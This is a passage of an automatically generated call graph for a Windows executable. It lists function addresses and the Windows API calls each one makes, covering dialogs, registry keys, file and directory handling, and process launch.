7ff6fe1af461 27585->27586 27586->27585 28997 7ff6fe1a8df4 16 API calls _handle_error 27586->28997 27588 7ff6fe1af479 SendMessageW DeleteObject 27588->27580 27590 7ff6fe18252a SetWindowTextW 27589->27590 27591 7ff6fe182527 27589->27591 27592 7ff6fe1ee2e0 27590->27592 27591->27590 27593->26983 27595 7ff6fe1932bc 51 API calls 27594->27595 27596 7ff6fe1932b1 27595->27596 27596->27061 27596->27087 27597->27061 27598->27142 27599->27170 27600->27181 27601->27191 27602->27196 27603->27205 27605 7ff6fe1b3620 27604->27605 27605->27209 27606->27125 27608 7ff6fe181177 27607->27608 27609 7ff6fe182034 33 API calls 27608->27609 27610 7ff6fe181185 memcpy_s 27609->27610 27610->27140 27611->27163 27612->27230 27613->27255 27614->27270 27615->27282 27617 7ff6fe193e28 swprintf 46 API calls 27616->27617 27618 7ff6fe19a509 27617->27618 27619 7ff6fe1a0f68 WideCharToMultiByte 27618->27619 27620 7ff6fe19a519 27619->27620 27621 7ff6fe19a589 27620->27621 27635 7ff6fe199800 31 API calls 27620->27635 27639 7ff6fe19a56a SetDlgItemTextW 27620->27639 27641 7ff6fe199408 27621->27641 27624 7ff6fe19a603 27626 7ff6fe19a6c2 27624->27626 27627 7ff6fe19a60c GetWindowLongPtrW 27624->27627 27625 7ff6fe19a6f2 GetSystemMetrics GetWindow 27628 7ff6fe19a821 27625->27628 27638 7ff6fe19a71d 27625->27638 27656 7ff6fe1995a8 27626->27656 27630 7ff6fe1ee2c0 27627->27630 27629 7ff6fe1b2320 _handle_error 8 API calls 27628->27629 27632 7ff6fe19a830 27629->27632 27633 7ff6fe19a6aa GetWindowRect 27630->27633 27632->27295 27633->27626 27635->27620 27636 7ff6fe19a73e GetWindowRect 27636->27638 27637 7ff6fe19a6e5 SetWindowTextW 27637->27625 27638->27628 27638->27636 27640 7ff6fe19a800 GetWindow 27638->27640 27639->27620 27640->27628 27640->27638 27642 7ff6fe1995a8 47 API calls 27641->27642 27645 7ff6fe19944f 27642->27645 27643 7ff6fe19955a 27644 7ff6fe1b2320 _handle_error 8 API calls 27643->27644 27646 7ff6fe19958e GetWindowRect GetClientRect 27644->27646 27645->27643 27647 7ff6fe18129c 33 API calls 27645->27647 27646->27624 27646->27625 27648 7ff6fe19949c 27647->27648 27649 7ff6fe18129c 33 API calls 27648->27649 27655 7ff6fe1995a1 27648->27655 27651 7ff6fe199514 27649->27651 27650 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27652 7ff6fe1995a7 27650->27652 27651->27643 27653 7ff6fe19959c 27651->27653 27654 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27653->27654 27654->27655 27655->27650 27657 7ff6fe193e28 swprintf 46 API calls 27656->27657 27658 7ff6fe1995eb 27657->27658 27659 7ff6fe1a0f68 WideCharToMultiByte 27658->27659 27660 7ff6fe199603 27659->27660 27661 7ff6fe199800 31 API calls 27660->27661 27662 7ff6fe19961b 27661->27662 27663 7ff6fe1b2320 _handle_error 8 API calls 27662->27663 27664 7ff6fe19962b 27663->27664 27664->27625 27664->27637 27666 7ff6fe1813a4 33 API calls 27665->27666 27667 7ff6fe182462 GetWindowTextW 27666->27667 27668 7ff6fe182494 27667->27668 27669 7ff6fe18129c 33 API calls 27668->27669 27670 7ff6fe1824a2 27669->27670 27672 7ff6fe182505 27670->27672 27675 7ff6fe1824dd 27670->27675 27671 7ff6fe1b2320 _handle_error 8 API calls 27673 7ff6fe1824f3 27671->27673 27674 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27672->27674 27673->27303 27676 7ff6fe18250a 27674->27676 27675->27671 27677->27315 27679->27329 27681 7ff6fe1aae80 GetDlgItem 27680->27681 27682 7ff6fe1aae3c GetMessageW 27680->27682 27681->27340 27681->27341 27683 7ff6fe1aae6a TranslateMessage DispatchMessageW 27682->27683 27684 7ff6fe1aae5b IsDialogMessageW 27682->27684 27683->27681 27684->27681 27684->27683 27686 7ff6fe1ace06 27685->27686 27688 7ff6fe1ace1f RegCreateKeyExW 27685->27688 27687 7ff6fe1820b0 33 API calls 27686->27687 27687->27688 27688->27358 27688->27359 27691 7ff6fe1936b3 27689->27691 27690 7ff6fe1936e0 27693 7ff6fe1932bc 51 API calls 27690->27693 27691->27690 27692 7ff6fe1936cc CreateDirectoryW 27691->27692 27692->27690 27694 7ff6fe19377d 27692->27694 27695 7ff6fe1936ee 27693->27695 27696 7ff6fe19378d 27694->27696 27709 7ff6fe193d34 27694->27709 27697 7ff6fe193791 GetLastError 27695->27697 27698 7ff6fe196a0c 49 API calls 27695->27698 27701 7ff6fe1b2320 _handle_error 8 API calls 27696->27701 27697->27696 27700 7ff6fe19371c 27698->27700 27702 7ff6fe193720 CreateDirectoryW 27700->27702 27703 7ff6fe19373b 27700->27703 27704 7ff6fe1937b9 27701->27704 27702->27703 27705 7ff6fe1937ce 27703->27705 27706 7ff6fe193774 27703->27706 27704->27372 27707 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27705->27707 27706->27694 27706->27697 27708 7ff6fe1937d3 27707->27708 27710 7ff6fe193d5e SetFileAttributesW 27709->27710 27711 7ff6fe193d5b 27709->27711 27712 7ff6fe193d74 27710->27712 27713 7ff6fe193df5 27710->27713 27711->27710 27715 7ff6fe196a0c 49 API calls 27712->27715 27714 7ff6fe1b2320 _handle_error 8 API calls 27713->27714 27716 7ff6fe193e0a 27714->27716 27717 7ff6fe193d99 27715->27717 27716->27696 27718 7ff6fe193dbc 27717->27718 27719 7ff6fe193d9d SetFileAttributesW 27717->27719 27718->27713 27720 7ff6fe193e1a 27718->27720 27719->27718 27721 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27720->27721 27722 7ff6fe193e1f 27721->27722 27724 7ff6fe18713b 27723->27724 27725 7ff6fe187206 27723->27725 27730 7ff6fe18714b memcpy_s 27724->27730 27732 7ff6fe183f48 33 API calls 2 library calls 27724->27732 27733 7ff6fe18704c 47 API calls memcpy_s 27725->27733 27728 7ff6fe187273 27728->27388 27729 7ff6fe18720b 27729->27728 27734 7ff6fe18889c 8 API calls memcpy_s 27729->27734 27730->27388 27732->27730 27733->27729 27734->27729 27736 7ff6fe1aaa36 27735->27736 27737 7ff6fe1aaa2f 27735->27737 27736->27737 27738 7ff6fe181744 33 API calls 27736->27738 27737->27453 27738->27736 27739->27453 27741 7ff6fe1aa47f 27740->27741 27762 7ff6fe1aa706 27740->27762 27742 7ff6fe1acdf8 33 API calls 27741->27742 27744 7ff6fe1aa49e 27742->27744 27743 7ff6fe1b2320 _handle_error 8 API calls 27745 7ff6fe1aa717 27743->27745 27746 7ff6fe18129c 33 API calls 27744->27746 27745->27481 27747 7ff6fe1aa4de 27746->27747 27748 7ff6fe18129c 33 API calls 27747->27748 27749 7ff6fe1aa517 27748->27749 27750 7ff6fe18129c 33 API calls 27749->27750 27751 7ff6fe1aa54a 27750->27751 27752 7ff6fe1aa834 35 API calls 27751->27752 27753 7ff6fe1aa573 27752->27753 27755 7ff6fe1aa73a 27753->27755 27757 7ff6fe1aa740 27753->27757 27759 7ff6fe1820b0 33 API calls 27753->27759 27760 7ff6fe1aa685 27753->27760 27767 7ff6fe1aa734 27753->27767 27754 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27754->27755 27756 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27755->27756 27756->27757 27758 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27757->27758 27761 7ff6fe1aa746 27758->27761 27759->27760 27760->27761 27760->27762 27763 7ff6fe1aa72f 27760->27763 27764 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27761->27764 27762->27743 27766 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27763->27766 27765 7ff6fe1aa74c 27764->27765 27768 7ff6fe18255c 61 API calls 27765->27768 27766->27767 27767->27754 27769 7ff6fe1aa795 27768->27769 27770 7ff6fe1aa7b1 27769->27770 27771 7ff6fe1aa801 SetDlgItemTextW 27769->27771 27775 7ff6fe1aa7a1 27769->27775 27772 7ff6fe1b2320 _handle_error 8 API calls 27770->27772 27771->27770 27773 7ff6fe1aa827 27772->27773 27773->27481 27774 7ff6fe1aa7ad 27774->27770 27776 7ff6fe1aa7b7 EndDialog 27774->27776 27775->27770 27775->27774 27901 7ff6fe19bb00 102 API calls 27775->27901 27776->27770 27779 7ff6fe1973a6 27778->27779 27780 7ff6fe188d04 33 API calls 27779->27780 27782 7ff6fe1973b6 27780->27782 27781 7ff6fe1973f7 27783 7ff6fe182034 33 API calls 27781->27783 27782->27781 27784 7ff6fe181744 33 API calls 27782->27784 27785 7ff6fe19743d 27783->27785 27784->27781 27786 7ff6fe197460 27785->27786 27787 7ff6fe1820b0 33 API calls 27785->27787 27788 7ff6fe197498 27786->27788 27790 7ff6fe1974b4 27786->27790 27787->27786 27789 7ff6fe1b2320 _handle_error 8 API calls 27788->27789 27791 7ff6fe1974a9 27789->27791 27792 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27790->27792 27791->27453 27793 7ff6fe1974b9 27792->27793 27795 7ff6fe1940af 27794->27795 27796 7ff6fe194096 27794->27796 27795->27453 27797 7ff6fe1820b0 33 API calls 27796->27797 27797->27795 27804 7ff6fe1af529 memcpy_s 27798->27804 27815 7ff6fe1af87d 27798->27815 27799 7ff6fe181fa0 31 API calls 27800 7ff6fe1af89c 27799->27800 27801 7ff6fe1b2320 _handle_error 8 API calls 27800->27801 27802 7ff6fe1af8a8 27801->27802 27802->27494 27803 7ff6fe1af684 27806 7ff6fe18129c 33 API calls 27803->27806 27804->27803 27902 7ff6fe1a13c4 CompareStringW 27804->27902 27807 7ff6fe1af6c0 27806->27807 27808 7ff6fe1932a8 51 API calls 27807->27808 27809 7ff6fe1af6ca 27808->27809 27810 7ff6fe181fa0 31 API calls 27809->27810 27813 7ff6fe1af6d5 27810->27813 27811 7ff6fe1af742 ShellExecuteExW 27812 7ff6fe1af846 27811->27812 27820 7ff6fe1af755 27811->27820 27812->27815 27818 7ff6fe1af8fb 27812->27818 27813->27811 27814 7ff6fe18129c 33 API calls 27813->27814 27817 7ff6fe1af717 27814->27817 27815->27799 27816 7ff6fe1af78e 27904 7ff6fe1afe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27816->27904 27903 7ff6fe195b60 53 API calls 2 library calls 27817->27903 27822 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27818->27822 27819 7ff6fe1af7e3 CloseHandle 27823 7ff6fe1af801 27819->27823 27824 7ff6fe1af7f2 27819->27824 27820->27816 27820->27819 27825 7ff6fe1af781 ShowWindow 27820->27825 27828 7ff6fe1af900 27822->27828 27823->27812 27832 7ff6fe1af837 ShowWindow 27823->27832 27905 7ff6fe1a13c4 CompareStringW 27824->27905 27825->27816 27827 7ff6fe1af725 27831 7ff6fe181fa0 31 API calls 27827->27831 27830 7ff6fe1af7a6 27830->27819 27834 7ff6fe1af7b4 GetExitCodeProcess 27830->27834 27833 7ff6fe1af72f 27831->27833 27832->27812 27833->27811 27834->27819 27835 7ff6fe1af7c7 27834->27835 27835->27819 27836->27453 27837->27453 27838->27453 27839->27453 27841 7ff6fe1aa865 RegOpenKeyExW 27840->27841 27842 7ff6fe1aa862 27840->27842 27843 7ff6fe1aa9c4 27841->27843 27846 7ff6fe1aa889 27841->27846 27842->27841 27844 7ff6fe1aa9e2 27843->27844 27845 7ff6fe1820b0 33 API calls 27843->27845 27844->27453 27845->27844 27847 7ff6fe1aa9b5 RegCloseKey 27846->27847 27848 7ff6fe1813a4 33 API calls 27846->27848 27847->27843 27847->27844 27849 7ff6fe1aa8f1 27848->27849 27850 7ff6fe1aa976 27849->27850 27854 7ff6fe1aa944 27849->27854 27906 7ff6fe1a9744 33 API calls 2 library calls 27849->27906 27850->27847 27852 7ff6fe1aa9b0 27850->27852 27853 7ff6fe1aa9ff 27850->27853 27852->27847 27855 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27853->27855 27856 7ff6fe1820b0 33 API calls 27854->27856 27857 7ff6fe1aaa04 27855->27857 27856->27850 27858->27453 27859->27453 27860->27453 27862 7ff6fe1972ea 27861->27862 27907 7ff6fe18b3a8 27862->27907 27866 7ff6fe1931e4 27865->27866 27867 7ff6fe1931e7 DeleteFileW 27865->27867 27866->27867 27868 7ff6fe19327c 27867->27868 27869 7ff6fe1931fd 27867->27869 27870 7ff6fe1b2320 _handle_error 8 API calls 27868->27870 27871 7ff6fe196a0c 49 API calls 27869->27871 27872 7ff6fe193291 27870->27872 27873 7ff6fe193222 27871->27873 27872->27453 27874 7ff6fe193243 27873->27874 27875 7ff6fe193226 DeleteFileW 27873->27875 27874->27868 27876 7ff6fe1932a1 27874->27876 27875->27874 27877 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27876->27877 27878 7ff6fe1932a6 27877->27878 27880->27453 27881->27453 27882->27453 27883->27453 27884->27453 27885->27453 27889 7ff6fe19d25e 27886->27889 27887 7ff6fe19d292 27887->27545 27888 7ff6fe181744 33 API calls 27888->27889 27889->27887 27889->27888 27890->27443 27891->27432 27893->27413 27894->27416 27895->27418 27896->27472 27897->27486 27899->27491 27901->27774 27902->27803 27903->27827 27904->27830 27905->27823 27906->27854 27910 7ff6fe18b3f2 memcpy_s 27907->27910 27908 7ff6fe1b2320 _handle_error 8 API calls 27909 7ff6fe18b4b6 27908->27909 27909->27453 27910->27908 27967 7ff6fe1986ec 27911->27967 27913 7ff6fe18e3c4 27977 7ff6fe18e600 27913->27977 27915 7ff6fe18e4d4 27916 7ff6fe1b21d0 33 API calls 27915->27916 27921 7ff6fe18e4f0 27916->27921 27917 7ff6fe18e549 27919 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27917->27919 27918 7ff6fe18e454 27918->27915 27918->27917 27927 7ff6fe18e54e 27919->27927 27983 7ff6fe1a3148 102 API calls 27921->27983 27922 7ff6fe18e51d 27923 7ff6fe1b2320 _handle_error 8 API calls 27922->27923 27925 7ff6fe18e52d 27923->27925 27924 7ff6fe1918c2 27926 7ff6fe19190d 27924->27926 27929 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27924->27929 27925->27562 27926->27562 27927->27924 27927->27926 27928 7ff6fe181fa0 31 API calls 27927->27928 27928->27927 27930 7ff6fe19193b 27929->27930 27932 7ff6fe18e7ea 27931->27932 27933 7ff6fe18e864 27932->27933 27938 7ff6fe18e8a1 27932->27938 27996 7ff6fe193ec8 27932->27996 27935 7ff6fe18e993 27933->27935 27933->27938 27936 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27935->27936 27939 7ff6fe18e998 27936->27939 27937 7ff6fe18e955 27941 7ff6fe1b2320 _handle_error 8 API calls 27937->27941 27943 7ff6fe18e900 27938->27943 28003 7ff6fe18f578 27938->28003 27942 7ff6fe18e97e 27941->27942 27945 7ff6fe18e578 27942->27945 27943->27937 28039 7ff6fe1828a4 82 API calls 2 library calls 27943->28039 28981 7ff6fe1915d8 27945->28981 27948 7ff6fe18e59e 27950 7ff6fe181fa0 31 API calls 27948->27950 27949 7ff6fe1a1870 108 API calls 27949->27948 27951 7ff6fe18e5b7 27950->27951 27952 7ff6fe181fa0 31 API calls 27951->27952 27953 7ff6fe18e5c3 27952->27953 27954 7ff6fe181fa0 31 API calls 27953->27954 27955 7ff6fe18e5cf 27954->27955 27956 7ff6fe19878c 108 API calls 27955->27956 27957 7ff6fe18e5db 27956->27957 27958 7ff6fe181fa0 31 API calls 27957->27958 27959 7ff6fe18e5e4 27958->27959 27960 7ff6fe181fa0 31 API calls 27959->27960 27962 7ff6fe18e5ed 27960->27962 27961 7ff6fe1918c2 27963 7ff6fe19190d 27961->27963 27965 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 27961->27965 27962->27961 27962->27963 27964 7ff6fe181fa0 31 API calls 27962->27964 27963->27566 27964->27962 27966 7ff6fe19193b 27965->27966 27968 7ff6fe19870a 27967->27968 27969 7ff6fe1b21d0 33 API calls 27968->27969 27970 7ff6fe19872f 27969->27970 27971 7ff6fe198743 27970->27971 27984 7ff6fe189f1c 27970->27984 27973 7ff6fe1b21d0 33 API calls 27971->27973 27974 7ff6fe198759 27973->27974 27975 7ff6fe189f1c 33 API calls 27974->27975 27976 7ff6fe19876b 27974->27976 27975->27976 27976->27913 27978 7ff6fe18e627 27977->27978 27982 7ff6fe18e62c memcpy_s 27977->27982 27979 7ff6fe181fa0 31 API calls 27978->27979 27979->27982 27980 7ff6fe18e668 memcpy_s 27980->27918 27981 7ff6fe181fa0 31 API calls 27981->27980 27982->27980 27982->27981 27983->27922 27989 7ff6fe1b24a0 27984->27989 27987 7ff6fe1b24a0 33 API calls 27988 7ff6fe189f75 memcpy_s 27987->27988 27988->27971 27990 7ff6fe1b24d1 27989->27990 27991 7ff6fe189f4a 27990->27991 27993 7ff6fe189fb0 27990->27993 27991->27987 27994 7ff6fe19b788 33 API calls 27993->27994 27995 7ff6fe189fc2 27994->27995 27995->27990 27997 7ff6fe1972cc 8 API calls 27996->27997 27998 7ff6fe193ee1 27997->27998 28002 7ff6fe193f0f 27998->28002 28040 7ff6fe1940bc 27998->28040 28001 7ff6fe193efa FindClose 28001->28002 28002->27932 28004 7ff6fe18f598 _snwprintf 28003->28004 28066 7ff6fe182950 28004->28066 28007 7ff6fe18f5cc 28011 7ff6fe18f5fc 28007->28011 28083 7ff6fe1833e4 28007->28083 28010 7ff6fe18f5f8 28010->28011 28115 7ff6fe183ad8 28010->28115 28334 7ff6fe182c54 28011->28334 28019 7ff6fe188d04 33 API calls 28020 7ff6fe18f662 28019->28020 28354 7ff6fe197918 48 API calls 2 library calls 28020->28354 28022 7ff6fe18f677 28023 7ff6fe193ec8 55 API calls 28022->28023 28033 7ff6fe18f6ad 28023->28033 28024 7ff6fe18f842 28024->28011 28146 7ff6fe1869f8 28024->28146 28157 7ff6fe18f930 28024->28157 28030 7ff6fe18f74d 28031 7ff6fe18f7cb 28030->28031 28032 7ff6fe18f89a 28030->28032 28035 7ff6fe18f895 28030->28035 28125 7ff6fe18f8a4 28031->28125 28034 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28032->28034 28033->28030 28033->28032 28036 7ff6fe193ec8 55 API calls 28033->28036 28355 7ff6fe197918 48 API calls 2 library calls 28033->28355 28037 7ff6fe18f8a0 28034->28037 28038 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28035->28038 28036->28033 28038->28032 28039->27937 28041 7ff6fe1941d2 FindNextFileW 28040->28041 28042 7ff6fe1940f9 FindFirstFileW 28040->28042 28044 7ff6fe1941e1 GetLastError 28041->28044 28045 7ff6fe1941f3 28041->28045 28042->28045 28046 7ff6fe19411e 28042->28046 28060 7ff6fe1941c0 28044->28060 28048 7ff6fe194211 28045->28048 28051 7ff6fe1820b0 33 API calls 28045->28051 28047 7ff6fe196a0c 49 API calls 28046->28047 28050 7ff6fe194144 28047->28050 28052 7ff6fe18129c 33 API calls 28048->28052 28049 7ff6fe1b2320 _handle_error 8 API calls 28053 7ff6fe193ef4 28049->28053 28054 7ff6fe194167 28050->28054 28055 7ff6fe194148 FindFirstFileW 28050->28055 28051->28048 28056 7ff6fe19423b 28052->28056 28053->28001 28053->28002 28054->28045 28057 7ff6fe1941af GetLastError 28054->28057 28059 7ff6fe194314 28054->28059 28055->28054 28058 7ff6fe198090 47 API calls 28056->28058 28057->28060 28061 7ff6fe194249 28058->28061 28062 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28059->28062 28060->28049 28061->28060 28064 7ff6fe19430f 28061->28064 28063 7ff6fe19431a 28062->28063 28065 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28064->28065 28065->28059 28067 7ff6fe18296c 28066->28067 28068 7ff6fe189f1c 33 API calls 28067->28068 28069 7ff6fe182980 28068->28069 28070 7ff6fe1986ec 33 API calls 28069->28070 28071 7ff6fe18298d 28070->28071 28072 7ff6fe182ac2 28071->28072 28073 7ff6fe1b21d0 33 API calls 28071->28073 28356 7ff6fe194d04 28072->28356 28075 7ff6fe182ab0 28073->28075 28075->28072 28077 7ff6fe1891c8 35 API calls 28075->28077 28077->28072 28078 7ff6fe192ca8 28082 7ff6fe1924c0 54 API calls 28078->28082 28079 7ff6fe192cc1 28080 7ff6fe192cc5 28079->28080 28370 7ff6fe18b7e8 99 API calls 2 library calls 28079->28370 28080->28007 28082->28079 28109 7ff6fe1928d0 104 API calls 28083->28109 28084 7ff6fe183674 28371 7ff6fe1828a4 82 API calls 2 library calls 28084->28371 28085 7ff6fe183431 memcpy_s 28093 7ff6fe18344e 28085->28093 28096 7ff6fe183601 28085->28096 28106 7ff6fe192bb0 101 API calls 28085->28106 28087 7ff6fe1869f8 141 API calls 28089 7ff6fe183682 28087->28089 28088 7ff6fe1834cc 28110 7ff6fe1928d0 104 API calls 28088->28110 28089->28087 28090 7ff6fe18370c 28089->28090 28089->28096 28111 7ff6fe192aa0 101 API calls 28089->28111 28094 7ff6fe183740 28090->28094 28090->28096 28372 7ff6fe1828a4 82 API calls 2 library calls 28090->28372 28092 7ff6fe1835cb 28092->28093 28095 7ff6fe1835d7 28092->28095 28093->28084 28093->28089 28094->28096 28099 7ff6fe18384d 28094->28099 28112 7ff6fe192bb0 101 API calls 28094->28112 28095->28096 28097 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28095->28097 28096->28010 28100 7ff6fe183891 28097->28100 28098 7ff6fe1834eb 28098->28092 28108 7ff6fe192aa0 101 API calls 28098->28108 28099->28096 28101 7ff6fe1820b0 33 API calls 28099->28101 28100->28010 28101->28096 28102 7ff6fe1869f8 141 API calls 28104 7ff6fe18378e 28102->28104 28103 7ff6fe1835a7 28103->28092 28113 7ff6fe1928d0 104 API calls 28103->28113 28104->28102 28105 7ff6fe183803 28104->28105 28114 7ff6fe192aa0 101 API calls 28104->28114 28107 7ff6fe192aa0 101 API calls 28105->28107 28106->28088 28107->28099 28108->28103 28109->28085 28110->28098 28111->28089 28112->28104 28113->28092 28114->28104 28116 7ff6fe183b55 28115->28116 28117 7ff6fe183af9 28115->28117 28118 7ff6fe1b2320 _handle_error 8 API calls 28116->28118 28373 7ff6fe183378 28117->28373 28120 7ff6fe183b67 28118->28120 28120->28019 28120->28031 28122 7ff6fe183b6c 28123 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28122->28123 28124 7ff6fe183b71 28123->28124 28596 7ff6fe19886c 28125->28596 28127 7ff6fe18f8ba 28600 7ff6fe19ef60 GetSystemTime SystemTimeToFileTime 28127->28600 28130 7ff6fe1a0994 28131 7ff6fe1b0340 28130->28131 28132 7ff6fe197df4 47 API calls 28131->28132 28133 7ff6fe1b0373 28132->28133 28134 7ff6fe19aae0 48 API calls 28133->28134 28135 7ff6fe1b0387 28134->28135 28136 7ff6fe19da98 48 API calls 28135->28136 28137 7ff6fe1b0397 28136->28137 28138 7ff6fe181fa0 31 API calls 28137->28138 28139 7ff6fe1b03a2 28138->28139 28609 7ff6fe1afc68 28139->28609 28147 7ff6fe186a0a 28146->28147 28148 7ff6fe186a0e 28146->28148 28147->28024 28156 7ff6fe192bb0 101 API calls 28148->28156 28149 7ff6fe186a1b 28150 7ff6fe186a3e 28149->28150 28152 7ff6fe186a2f 28149->28152 28704 7ff6fe185130 139 API calls 2 library calls 28150->28704 28152->28147 28621 7ff6fe185e24 28152->28621 28154 7ff6fe186a3c 28154->28147 28705 7ff6fe18466c 82 API calls 28154->28705 28156->28149 28158 7ff6fe18f978 28157->28158 28162 7ff6fe18f9b0 28158->28162 28215 7ff6fe18fa34 28158->28215 28826 7ff6fe1a612c 146 API calls 3 library calls 28158->28826 28160 7ff6fe191189 28163 7ff6fe19118e 28160->28163 28166 7ff6fe1911e1 28160->28166 28161 7ff6fe1b2320 _handle_error 8 API calls 28165 7ff6fe1911c4 28161->28165 28162->28160 28164 7ff6fe18f9d0 28162->28164 28162->28215 28163->28215 28874 7ff6fe18dd08 179 API calls 28163->28874 28164->28215 28741 7ff6fe189bb0 28164->28741 28165->28024 28166->28215 28875 7ff6fe1a612c 146 API calls 3 library calls 28166->28875 28170 7ff6fe18fad6 28754 7ff6fe195ef8 28170->28754 28215->28161 28335 7ff6fe182c74 28334->28335 28340 7ff6fe182c88 28334->28340 28335->28340 28960 7ff6fe182d80 108 API calls _invalid_parameter_noinfo_noreturn 28335->28960 28336 7ff6fe181fa0 31 API calls 28338 7ff6fe182ca1 28336->28338 28341 7ff6fe182d64 28338->28341 28961 7ff6fe183090 31 API calls _invalid_parameter_noinfo_noreturn 28338->28961 28340->28336 28343 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28341->28343 28342 7ff6fe182d08 28962 7ff6fe183090 31 API calls _invalid_parameter_noinfo_noreturn 28342->28962 28345 7ff6fe182d7c 28343->28345 28346 7ff6fe182d14 28347 7ff6fe181fa0 31 API calls 28346->28347 28348 7ff6fe182d20 28347->28348 28963 7ff6fe19878c 28348->28963 28354->28022 28355->28033 28357 7ff6fe194d32 memcpy_s 28356->28357 28366 7ff6fe194bac 28357->28366 28359 7ff6fe194d54 28360 7ff6fe194d90 28359->28360 28362 7ff6fe194dae 28359->28362 28361 7ff6fe1b2320 _handle_error 8 API calls 28360->28361 28363 7ff6fe182b32 28361->28363 28364 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28362->28364 28363->28007 28363->28078 28365 7ff6fe194db3 28364->28365 28367 7ff6fe194c2f memcpy_s 28366->28367 28368 7ff6fe194c27 28366->28368 28367->28359 28369 7ff6fe181fa0 31 API calls 28368->28369 28369->28367 28370->28080 28371->28096 28372->28094 28374 7ff6fe18339a 28373->28374 28377 7ff6fe183396 28373->28377 28379 7ff6fe183294 28374->28379 28377->28116 28377->28122 28378 7ff6fe192aa0 101 API calls 28378->28377 28380 7ff6fe1832bb 28379->28380 28382 7ff6fe1832f6 28379->28382 28381 7ff6fe1869f8 141 API calls 28380->28381 28385 7ff6fe1832db 28381->28385 28387 7ff6fe186e74 28382->28387 28385->28378 28391 7ff6fe186e95 28387->28391 28388 7ff6fe1869f8 141 API calls 28388->28391 28389 7ff6fe18331d 28389->28385 28392 7ff6fe183904 28389->28392 28391->28388 28391->28389 28419 7ff6fe19e808 28391->28419 28427 7ff6fe186a7c 28392->28427 28395 7ff6fe18396a 28398 7ff6fe18399a 28395->28398 28399 7ff6fe183989 28395->28399 28396 7ff6fe183a8a 28400 7ff6fe1b2320 _handle_error 8 API calls 28396->28400 28403 7ff6fe1839ec 28398->28403 28404 7ff6fe1839a3 28398->28404 28459 7ff6fe1a0d54 28399->28459 28402 7ff6fe183a9e 28400->28402 28402->28385 28465 7ff6fe1826b4 33 API calls memcpy_s 28403->28465 28464 7ff6fe1a0c80 33 API calls 28404->28464 28405 7ff6fe183ab3 28406 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28405->28406 28408 7ff6fe183ab8 28406->28408 28412 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28408->28412 28409 7ff6fe1839b0 28413 7ff6fe181fa0 31 API calls 28409->28413 28417 7ff6fe1839c0 memcpy_s 28409->28417 28411 7ff6fe183a13 28466 7ff6fe1a0ae8 34 API calls _invalid_parameter_noinfo_noreturn 28411->28466 28416 7ff6fe183abe 28412->28416 28413->28417 28414 7ff6fe181fa0 31 API calls 28418 7ff6fe18394f 28414->28418 28417->28414 28418->28396 28418->28405 28418->28408 28420 7ff6fe19e811 28419->28420 28421 7ff6fe19e82b 28420->28421 28425 7ff6fe18b664 RtlPcToFileHeader RaiseException std::_Xinvalid_argument 28420->28425 28423 7ff6fe19e845 SetThreadExecutionState 28421->28423 28426 7ff6fe18b664 RtlPcToFileHeader RaiseException std::_Xinvalid_argument 28421->28426 28425->28421 28426->28423 28428 7ff6fe186a96 _snwprintf 28427->28428 28429 7ff6fe186ae4 28428->28429 28430 7ff6fe186ac4 28428->28430 28432 7ff6fe186d4d 28429->28432 28437 7ff6fe186b0f 28429->28437 28505 7ff6fe1828a4 82 API calls 2 library calls 28430->28505 28534 7ff6fe1828a4 82 API calls 2 library calls 28432->28534 28433 7ff6fe186ad0 28435 7ff6fe1b2320 _handle_error 8 API calls 28433->28435 28436 7ff6fe18394b 28435->28436 28436->28395 28436->28418 28463 7ff6fe182794 33 API calls __std_swap_ranges_trivially_swappable 28436->28463 28437->28433 28467 7ff6fe1a1f94 28437->28467 28440 7ff6fe186b85 28443 7ff6fe186c2a 28440->28443 28458 7ff6fe186b7b 28440->28458 28511 7ff6fe198968 109 API calls 28440->28511 28441 7ff6fe186b80 28441->28440 28507 7ff6fe1840b0 28441->28507 28442 7ff6fe186b6e 28506 7ff6fe1828a4 82 API calls 2 library calls 28442->28506 28476 7ff6fe194760 28443->28476 28449 7ff6fe186c52 28450 7ff6fe186cc7 28449->28450 28451 7ff6fe186cd1 28449->28451 28480 7ff6fe191794 28450->28480 28512 7ff6fe1a1f20 28451->28512 28495 7ff6fe1a1870 28458->28495 28461 7ff6fe1a0d8c 28459->28461 28460 7ff6fe1a0f48 28460->28418 28461->28460 28462 7ff6fe181744 33 API calls 28461->28462 28462->28461 28463->28395 28464->28409 28465->28411 28466->28418 28468 7ff6fe1a2056 std::bad_alloc::bad_alloc 28467->28468 28470 7ff6fe1a1fc5 std::bad_alloc::bad_alloc 28467->28470 28469 7ff6fe1b4078 std::_Xinvalid_argument 2 API calls 28468->28469 28469->28470 